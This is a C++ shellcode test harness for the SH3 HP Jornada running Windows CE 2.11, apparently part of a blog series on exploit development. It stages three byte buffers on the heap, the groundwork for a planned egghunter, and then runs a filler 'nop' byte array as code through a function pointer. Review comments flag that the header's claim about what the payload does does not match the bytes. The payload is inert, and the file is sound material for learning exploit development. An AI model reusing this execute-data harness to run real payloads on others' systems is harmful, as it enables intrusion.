  1. /*
  2. SCT.cpp
  3. Elias Augusto 3/26/2019
  4. A simple SH3 shellcode tester created for the HP Jornada 680/690 running Windows CE 2.11
  5. Part of an ongoing series on exploit development, find it on my medium:
  6.  
  7. Will execute 101 bytes of shellcode and push 303 bytes onto the heap in their own little chunks
  8. Currently all it does is nop 50 times and exit, but eventually it will test a custom-made omelette egghunter
  9. In the meantime, feel free to use this if you're interested
  10. */
  11. #include "stdafx.h"
  /*
   * Test payload that WinMain calls through a function pointer.
   * Ten rows of ten bytes, each row the pair 0x13 0x61 repeated five times.
   * The string-literal initialiser appends a terminating NUL, so
   * sizeof(mainsc) is 101 (100 payload bytes plus the terminator).
   * NOTE(review): the file header describes this as "nop 50 times and exit";
   * the array as written holds only the repeated pair and no distinct final
   * instruction, so how the payload exits is not visible here. Confirm on
   * the target.
   */
  unsigned char mainsc[] =
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61";

  /*
   * Three further buffers with the same byte pattern and the same size
   * (101 bytes each including the NUL). sconheap() copies each one into its
   * own heap allocation; they are not executed directly by this file.
   */
  unsigned char scptone[] =
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61";

  unsigned char scpttwo[] =
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61";

  unsigned char scptthree[] =
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61"
      "\x13\x61\x13\x61\x13\x61\x13\x61\x13\x61";
  55.                        
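  /*
   * Copies scptone, scpttwo and scptthree into three separate heap
   * allocations (3 x 101 = 303 bytes, matching the file header).
   *
   * Each buffer is allocated and copied using its own source array's size.
   * The original sized every memcpy from scptthree, which was only safe while
   * all three arrays stayed the same length; a longer scptthree would have
   * overrun the first two allocations and read past their sources.
   *
   * The copies are deliberately not freed on success: the pointers are
   * dropped on return so the chunks stay allocated for the life of the
   * process, which is the stated purpose of the test.
   *
   * Returns 0 on success, -1 if any allocation fails (in which case nothing
   * is left allocated).
   */
  int sconheap() {
      /* Element type is unsigned char, so sizeof gives the byte count
         directly, including the literal's terminating NUL. */
      const size_t len_one = sizeof(scptone);
      const size_t len_two = sizeof(scpttwo);
      const size_t len_three = sizeof(scptthree);

      unsigned char *scone = (unsigned char *)malloc(len_one);
      unsigned char *sctwo = (unsigned char *)malloc(len_two);
      unsigned char *scthree = (unsigned char *)malloc(len_three);

      /* memcpy into a NULL destination is undefined behaviour; bail out
         cleanly instead. free(NULL) is a no-op, so no per-pointer guard. */
      if (scone == NULL || sctwo == NULL || scthree == NULL) {
          free(scone);
          free(sctwo);
          free(scthree);
          return (-1);
      }

      memcpy(scone, scptone, len_one);
      memcpy(sctwo, scpttwo, len_two);
      memcpy(scthree, scptthree, len_three);
      return (0);
  }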
  66.  
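  /*
   * Program entry point: stages the three heap copies, then transfers
   * control to the bytes in mainsc by calling them through a function
   * pointer. None of the WinMain parameters are used.
   *
   * The call only works where the memory holding mainsc is executable. The
   * file header targets Windows CE 2.11 on SH3; on a platform that enforces
   * non-executable data pages the call would fault instead of running.
   *
   * Returns 0 after the payload returns, or 1 if sconheap() reports failure.
   */
  int WINAPI WinMain( HINSTANCE hInstance,
                      HINSTANCE hPrevInstance,
                      LPTSTR    lpCmdLine,
                      int       nCmdShow)
  {
      /* The original stored this result in an unused local; check it so a
         failed heap setup does not go unnoticed. */
      if (sconheap() != 0) {
          return 1;
      }

      /* Reinterpret the data array's address as a function taking no
         arguments. Control only comes back here if the payload itself
         returns to its caller. */
      int (*func)() = (int(*)())&mainsc;
      func();
      return 0;
  }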